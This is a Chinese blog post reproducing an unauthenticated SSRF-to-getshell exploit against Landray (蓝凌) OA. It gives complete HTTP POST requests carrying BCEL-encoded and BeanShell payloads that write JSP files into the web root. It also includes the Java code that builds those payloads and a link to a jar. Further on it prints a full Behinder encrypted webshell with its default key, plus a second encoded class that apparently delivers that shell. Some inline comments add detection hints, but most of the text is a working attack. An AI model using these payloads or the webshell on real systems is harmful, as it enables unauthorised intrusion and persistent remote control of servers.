蓝凌OA 前台SSRF+getshell

作者: print("") 分类: 漏洞复现 发布时间: 2021-05-06 10:27

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1:8080
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 174


var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util.ClassLoader"><void+method%3d"loadClass"><string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85U$ddV$dbF$Q$fe$W$hd$L$R$88$83$f9$L$a1$Jm$gC$A74Mh$nI1$Y$K$Y$93$Gb$C4$a1$b2$bc$b6Ed$c9$95$d6$81$b4$7d$9f$5e$e7F$f4$d4$e7$f4$B$fa$Qy$8d$de$f5tV$e0$80$5d$b7$f59$de$d5$ce$7c$3b$3b$df$cc$ec$ec$l$7f$fd$f6$3b$80$cf$f1$b3$8a1$cc$v$f8RE$H$e6T$7c$85y9$yD$f0H$c5c$3cQ$f15$WU$a4$b0$a4b$Zi$V$xXU$f0$8d$825$V$3d$98$8b$60$5d$c5$G2r$b1$ZAV$ce$5b$w4$3c$95$c3$b7$K$9e$a9$Y$c0$b6$82$j$VC$S$fe$5c$ce9$v$dcU$f0B$c1$kC$d7$82i$9b$e21C$u1$91c$I$_9$F$ce$d0$9b1m$9e$adU$f2$dc$dd$d1$f3$WIb$Z$c7$d0$ad$9c$ee$9ar$7d$$$M$8b$b2$e9I$dd$8a$ee$89u$cf$b1$d3F$d9I$z$a53$f3$Mj$fa$c4$e0Ua$3a6$n$c2$V$dd$b4$Z$G$S$H$99$p$fd$8d$9e$b4t$bb$94$dc$W$aei$97$e6$83cu$b7D$b0km$d4$M$91$F$c3j8iX$E$bbz$J$b5d$e9$9eG$a0pU$Xe$e9J$h$D$ac$c8p$e5La$3a$c9$V$d3$e2rC$d1$a9$J$86$91$s$f9VMTk$826r$bdB$98$9em$a1$h$af7$f5j$c0$97BF$b4$b6$9d$9akp$Jf$88$b7$f2$9e$91$c64$7c$84$9b$M$7d$adJ$F$fb$g$O$f0$9d$86$97xE1$ce$7b$e5$995$5bp$b7$ear$g$V$ij$f8$k$ba$82$bc$G$D$F$F$5cC$R$r$Fe$N$s$8e$U$bc$d6$60$a1$c2$a0$5dv$99a$b0$95r$aafZ$F$ee2$u$bb$e9$d4$f4ZvE$81$ad$c1AU$c3$P$mq$yi9$r$d3$3e$dc$a4$a4$bc$b87$3bs$e4$91$c6CE$3a$$4$d4$f0$86a$e8$df$c2$oA$c7$94J$aff$t$x$a6g$qS$8b$db$e9$H$f7$97$b9$e1$EgF$f4$d5$9c$97_$9d$7b$a4$e1$Eo5$fc$88$9f$u$b1$X$$$7e$u$L$8a$d0$85t$x$7f$c4$N$d1$q$da$v$d3q$FJ$82Qs$5dn$8b$c6$ba$3f1$91iEQ$ae$e2$r$$$96$i$K$e7$89$Ij$o$e3$e8$81$3f$c3M$f0K$w$b9$a7$ad$82$nj$d1G$ma$b8$9dhS$b2m$K$b0$b7ED$a4$c9$a3$a7$ae$p$88$Y$d1$5dv$ce$ee$c0x$c3$l$8f$T1S$bcM$b6b$c8$d8$d8$7f$p$u$u$B$db$C$3f$abF$86$d1$7fX$bd$d0$ce7$b2$d9F$c7$d0M$96$e4$dd$3eOI$c3$8e$cdE$f2$f93y$91$b5$cbk$aa$v$c9$w$b8k$cd$89$f8p$db$faZe$M$9d$5e$d52$v$bbw$da$c5$b2$ed$9d$ef$d2$abUnS$b6$a7$ff$t$fcM$V$_$9b$85p$g$a7$c6$dbm$cd$c9$82$a2$92$R$3c$cb$8f$cf$ee$Pu$be$7dj$w$89$e6$O$n$91Z$n$a8$eaT$adX$94e1$d0$d6$fd$U$f1$3b$a6$b0$92$a5$ce$c4Aj$o$87$5b$d4$cd$c7$m
$7f$n0$d9$Mh$7d$xh$f8$d4$8bh$ee$9c$3c$F$7bG$l$j$Y$a7Q6$7f$a0$haj$da$l$d3$97v$G$c2$t$b8M$f3$a7$f4$P$93$e4$G$a2$b8$83$c4$b9$a9$874KT$b4$8e$8e$bdS$84v$5b$cd$f5$o$82$beK$e6$a2$98$c0d$93$b9$I$ee$92g$y0$f7$9e$8e$L$d3$7c$f8$x$c2$3e$3ac$5d$3e$94$8dI$l$R$lQ$l$aa$8f$eeL$j$da$5e$j$3dt$d8$95$bb$b1$5e$l$7d$a1Y$lWc1$g$7c$5c$3bE$ff$e6$94$8f$f8n$j$D$7bS$a7$Y$ccN$d71D$e0$e1$d8$88$8f$eb$3eF$7fAx$e3$5d$e0$ca$3e$f5$bf$h$U$9a$f1$c0$9d$u$8d$fd$e4d$i$p$f4$$$z$60$Q$8b$f4H$adc$98p$a3$84$bc$8eW$ULId2$88P$WS$98$a6$d5$I$bd$8d3H$92$c5$F$d2$7f$86$7bD$7b$9d$u$cfR$98C$b8$lP$ee$f8$T$_$V$7c$B$C$3d$I$e2$f3$f0o$b7e$Ge$7b$H$A$A</string><void+method%3d"newInstance"></void></void></void></java>




var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void class="bsh.Interpreter"><void method="eval"><string>
import java.io.PrintWriter;
import sun.misc.BASE64Decoder;
Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");
            String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();
            PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_MainX12.jsp");
            String shell = "PCVvdXQucHJpbnRsbigiMTExMTExMTExMTEiKTslPg==";
            BASE64Decoder decoder = new BASE64Decoder();
            String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8");
            printWriter2.println(decodeString);
            printWriter2.close();
</string>
</void></void></java>



生成becl 代码

import org.apache.bcel.Repository;
import org.apache.bcel.classfile.JavaClass;
import org.apache.bcel.classfile.Utility;
import java.io.IOException;

/**
 * Encodes the compiled {@code FastJsonEchoBCEL} class into BCEL's {@code $$BCEL$$}
 * string form — the representation that
 * {@code com.sun.org.apache.bcel.internal.util.ClassLoader} accepts, and the one
 * embedded in the {@code fdParameters} value of the request shown above.
 *
 * <p>Detection note: a {@code $$BCEL$$} prefix inside request parameters is a
 * reliable indicator on its own. The encoding is reversible with BCEL's
 * {@code Utility.decode}, so a captured string can be turned back into a class
 * file and inspected during incident response.
 */
public class becl {

    /**
     * Looks the class up on the classpath, encodes its bytes and prints the result.
     *
     * @param args unused
     * @throws ClassNotFoundException if {@code FastJsonEchoBCEL} cannot be found on the classpath
     * @throws IOException if reading the class bytes fails
     */
    public static void main(String[] args) throws ClassNotFoundException, IOException {
        JavaClass javaClass = Repository.lookupClass(FastJsonEchoBCEL.class);
        // Second argument is BCEL's "compress" flag: the class bytes are compressed
        // before being encoded, which is why the emitted string is shorter than the
        // raw class file would be.
        String codes = Utility.encode(javaClass.getBytes(), true);
        System.out.println("$$BCEL$$"+codes);

    }

}

FastJsonEchoBCEL.java

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

import java.io.PrintWriter;
import sun.misc.BASE64Decoder;

/**
 * The class carried inside the BCEL-encoded string above. All of its effect lives
 * in the static initializer, so it runs as soon as the class is loaded and
 * instantiated (the request body calls {@code loadClass} and then
 * {@code newInstance}); the constructor and {@code main} are empty.
 *
 * <p>Behaviour, as visible in the static block: resolve the location of the jar
 * that {@code bsh.Interpreter} was loaded from, keep the part of that path before
 * {@code WEB-INF} (the web application root in a standard layout), and write a
 * file named {@code login_MainX146.jsp} there whose content is the Base64-decoded
 * {@code shell} constant. Every exception is swallowed, so a failed attempt leaves
 * no server-side error.
 *
 * <p>Detection / response notes: look for {@code .jsp} files created directly under
 * the application root that are not part of the deployment artifact, for request
 * bodies containing {@code $$BCEL$$}, and for references to {@code bsh.Interpreter}
 * in request parameters. {@code sun.misc.BASE64Decoder} is a JDK-internal API that
 * was removed in JDK 9, which is why the post says the class only compiles on JDK 7.
 */
public class FastJsonEchoBCEL {
    /** Intentionally empty; loading the class is what triggers the static block. */
    public FastJsonEchoBCEL() throws Exception {
    }

    /** Instantiates the class so the static initializer runs when executed directly. */
    public static void main(String[] args) throws Exception {
        new FastJsonEchoBCEL();
    }

    // Class-load-time side effect; nothing else in the class does any work.
    static {
        try {
            // bsh.Interpreter is used only as an anchor: its CodeSource yields the
            // path of the jar it was loaded from.
            Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");
            String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();
            // Everything before "WEB-INF" becomes the target directory; the file is
            // created next to the application's deployed JSPs.
            PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_MainX146.jsp");
            // Base64 of: <%out.println("111");%> — a write-probe page that prints a
            // marker, not a command shell.
            String shell = "PCVvdXQucHJpbnRsbigiMTExIik7JT4=";
            BASE64Decoder decoder = new BASE64Decoder();
            String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8");
            printWriter2.println(decodeString);
            printWriter2.close();
        } catch (Exception var5) {
            // Swallowed deliberately by the payload author: no log line is produced,
            // so the absence of an error in server logs is not evidence the write failed.
        }

    }
}

jar 如下:

https://www.o2oxy.cn/wp-content/uploads/2021/05/1.zip

只能通过JDK7去编译。这里编译好了一个冰xie的马

<%@page import=”java.util.*,javax.crypto.*,javax.crypto.spec.*”%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(“POST”)){String k=”e45e329feb5d925b”;/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(“u”,k);Cipher c=Cipher.getInstance(“AES”);c.init(2,new SecretKeySpec(k.getBytes(),”AES”));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85Vk$5b$db$d8$R$k$F$T$h$c7$d9$ecBH$c2$s$dd$edn$bb$5d$SB0$c6$97$90$90M$b1$b1$8dlY$60lK$b2$d26$d5$NK$b6n$e8$e2$mz$f9$3b$fd$bc_$9c$3e$e5y$fa$D$fa$87$fa$adO$e7$c8$90$F$ea$b6$e6$f1$b9$cc$ccy$cf$cc$3bx$e6$fc$e3_$7f$fb$3b$Al$c1$9f$d3$f05$bcI$c2$Pi$b8$Fo$d2$f0$W$7eM$86$dd$U$94$d3P$81$bd4T$a1$96$86$3a$ec$a7$81$86F$g$9a$c0$q$a1$95$E6$Nw$e1M$K$O$d2$f0$I$O$c9$a6$9d$82$p2w$d2$90$81n$KzI$e0$d2$f0$80$a0$f3d$WR$d0$t$c6$o$d1$bf$p$c3o$92$f0$db$q$fc$8e$82$db$3b$86m$E$3fP0$b7$fa$94$a3$mQqT$8d$82$7b$8caklh$c9$9a$d7$95d$T$r$8b$8c$a3H$s$ty$G$d9_$I$T$81n$f8DW$93$fc$a0$e1$3bvU$d1$9dr$a5$ca$bc$a6$m$5d$3dU470$i$h$z$S$96d$d8$U$3cX$7d$c7$M$a5$b1$b4aJ$f6$60$a3$Tx$86$3dx$j_$xy$D4$5b$9a$a1$a6$m$b5$a3$98$97N$w$s$9a$7dq$c5$aabJ$be$8fF$JW$Kt$e2$ca$M$80$8c$8b$8b$80$f7$8c$40$f3r$U$yOm$Mg$e3$f0$t9$9a$cd$fb$baf$9a$U$qUMA$W$3c$K$k1$7ehoX$86$afl$94w$3b$d5b$7eo$aa$n$98S$a3$e9$jx$fdX$f2$K$9f$a0$e3$eb$3f$c5$8f$d6w$3b$81$a4$8cZ$92$h$T$87$dc$p$3f$j$t$f4$U$adf$Q$o$97o$S$f8$82$e0d$e0$e7$f0$N$F$9f$dfT$s$e1$7d$G$7e$P$a8$97A$c1d$c9$be$fe$82$b61$I$d7$d3pL$82$9a$B$N$8e$930$c8$80$OF$S$86$Z$Y$81$99$E$x$D68Ip3p$C$Y$df$d2$M$o$uxx$93$c2rh$981$lI$beZ$5e$a7$d9Z$G$7c$I2$Q$c2$Y$Z7$9d$81a$bfoa$82$85$cd$7c$f1$c5$d0G$f4$P$e0$R$e7O$a9$b9$7c$de$a90$87$VnW$a9$d7l$b1Sve$a1$3cV$ec$f66m$b9$bajUCU8r$e5J$fe$84$a9$93$7d$z$cfXl$a4$J$e5$ac$i$cd$92$V$ce$94$3a7d$M$c7ht$f3$_$h$9d$daP$ae$d7$ce$94$a8$cc$d1u$$$af$d6$b9P$dco$N$da$b9S$5d$d9b$5br$ae6$S$85F$89$eb$e8$7b$b1$5d$f6t$dc$e7$8fL$c5$u$P$9bBp$a6$Ke$5c$eb$c3f7$d8V$f69C$ae$9bC$ba$ca$fa$7d$81$3d$a3$eb$8a$d3$b7$cd$y$fa$y$L$3c$edj$5b$NS$dd$e7$o$d9$u_$9c$x$8cD$5ete$8b$9bbG$ba$c1$ec$ed$fa$7d$a3$e0$8b$7c$c1V$eb$D$f7$60ks$3b$f6$937$z$ba$a2G$a2P$db$U$F6$cbX$aa$a9V7M$b5$ae$8f$c5$ca$c0e$y$eeT$e5k$be$S$N$8c$5eu$bb$cbUh$X$fd$eb$aa$fb$N$c4W$G$d2Y$d6$Q$bb$edM$b1$db$8a$Ox$d1$ec$P$b9$d1A$97$de$ec$ht$89$89$3c$c7$x$K$a6$97$97$dd$d1$890$K$Z$cf$Z$XJ$d6$f0$q$96$d9$O$5d$3dk$85$9d$ed$n$bf9b5$7ew$7c$a0I$fa$B$df$Yv$ab$b9$C$93cK$a5$a8U$94$c3$7e$b1Y$i$V$995$ad$e0$U$cd$82$b4V$_$U$xe$c5$e2$MQ0
$c7$b2$d5$3ea$b6X$T9u$e5$5c$3eD$ae$b2$9cU$f3U$be$e7$d0v$cf$60$ea$be$7b$90e$5d$a5$ae$c7$dc$k$f6$$$d7$F$5b$U$8e$g$b2$cdf$fb$7ca$uv$GF$bb$c7uicT$eaG$F$8c$cd$cc6$f7h$l9$dc$a2k$ac$d9$t$iW$DS$e3$d8$P$o$dfr$a4$u$3e_$d1$E$ccY$84$3cU$g$e5$p$aee4$3b$a3$d2$f4L$cfA$O$5dejw$91$H$c2$t$e1w$9a$c7n$7d$5b$X$eb$5c$d4$ac$8cP$8e9$8d$K$p9K$f2V$f3$9b$f5$82$a9F$98O$3e$l$ca$bcy$86$baJ$9bck$ec$f0$a8$w$f2$ec$f8$e2$5c$88$f3P$ce$j$99m$9b$b3D$Le$fb$NS$R8$e4$a3$j$8a9$$$db$b3$b8$cb$3bB$85$ac$ab$a7$88$dfs$d0O$b7$d9$v$84$a2$a0$5e$e5$e0J$be$f5$P$7d$5e5$db$b9$edP$r$ff$bf$95Q$e9$b8$d3$5b$c3J9$bb$f0$601$b8$f9$e3$cc$40$EgX$bcz$dd$da$faK$f2$a3$fbC$G$fe$I$a7$Z$f8$T$a9$jK3$ea$d15$90$Dy$a8$v$c15QW$f74I$c5$a2$a5$84$9e$a7$d9$c1$e5$fe$fe$eaS$e6$a6$V$d6$b6$e5$81$WT$i$y$3f$a7A$5c$8c$ZG$8a$3d$5d$b9f$7eEE$ce$ccTP$b0$60$e2$o$96P$f0$dd$ea$8c$5e1$a3$f2$df$bb$n$c2$a0$d1$a3C$cf$J00$Mw$cf$996$9fo$_$fd$f15$M$cc$I$a2$8d$9b6$I$f6$d5$ff$b6$40R$e2h$b1$f0$c7$d5$9b$82$t$ff$81$fa$93$W$f1$k$fd7$j$Fw$Q$894$d5$8b$94$5c$e2$d8Z$b0$d1$3b$o$j4su$8f$c5$97D$V7$b9$eb$89$f8$d4$e6$e6$7d$d740$95$df$cf$onfg$bd$z$b9$aefcj$d7$ff$P$d7$d7$fa$Ai$c9$81s$d9$f9$96g$j$e5$3e5$c8rx$7cL2$fb$60$a6Se$ec6$ab$ef$ca$b3$R$92q$db6$91$9cy$c5t$7c$N$be$c1$87$d2$d7$40$3es$40$91$de$88$fbo$e3$b7$U$85$7f$A$f3$cf$3e$C$f5$p$$n$c1$_p$q$ef$w2$s$e0$O$fc$SW$99$a9$R$7c$H$bf$c2$f9$7b$fc$sP$f2$V$y$c0$w$3c$bd$80$w$e1L$ac$W$ce$e1V$ff$p$cc$f17$e1$3e$83$U$dc$bb$C$b7$A$cf$60$ed$g$5c$K$9e$a3g$U$81$a3$ee$e2u$b7Q$a3$ff$V$S$T$98_$bc$3d$81d$f3$d9$ER$TX$98$40z$Cw$98s$c8$f4$cf$e1$$$5e$f6$d9$da$e2$bd$J$7c$3e$97$9b$c0$X$8b$8b8L$60$e9$p$dco$z$$$b3$e7$f0$A$N$k$beJ$9c$c3$a3$feJb$7d$C$x$8b_$7e$84$c7$af$e6$9f$af$ccO$e0$c9$f3$J$fc$ec$_$90h$fe$Y$fb$a4$c01$fa1$X$7b$fd$C$83$HXBo$ef$c3$97$b0$M$3b$f8$i$7c$L$Pa$l$9f$83$7dX$81$f7$uU$e0$J$9ex$M$D$3cE$o$db$87$q$da$f3$b0$8e$a7$B$f54l$40$W$91w0$caM$c8$n$Po$d1n$Lesh$fb$Y$f2P$c0$d8$fb$c8P$Re$f3$88C$88$7c$89$e3v$cc$d0$ad$7f$92$c7$c8$x$e4$D$5e$c7t$ee$fc$h$V$81v$a7$F$L$A$A
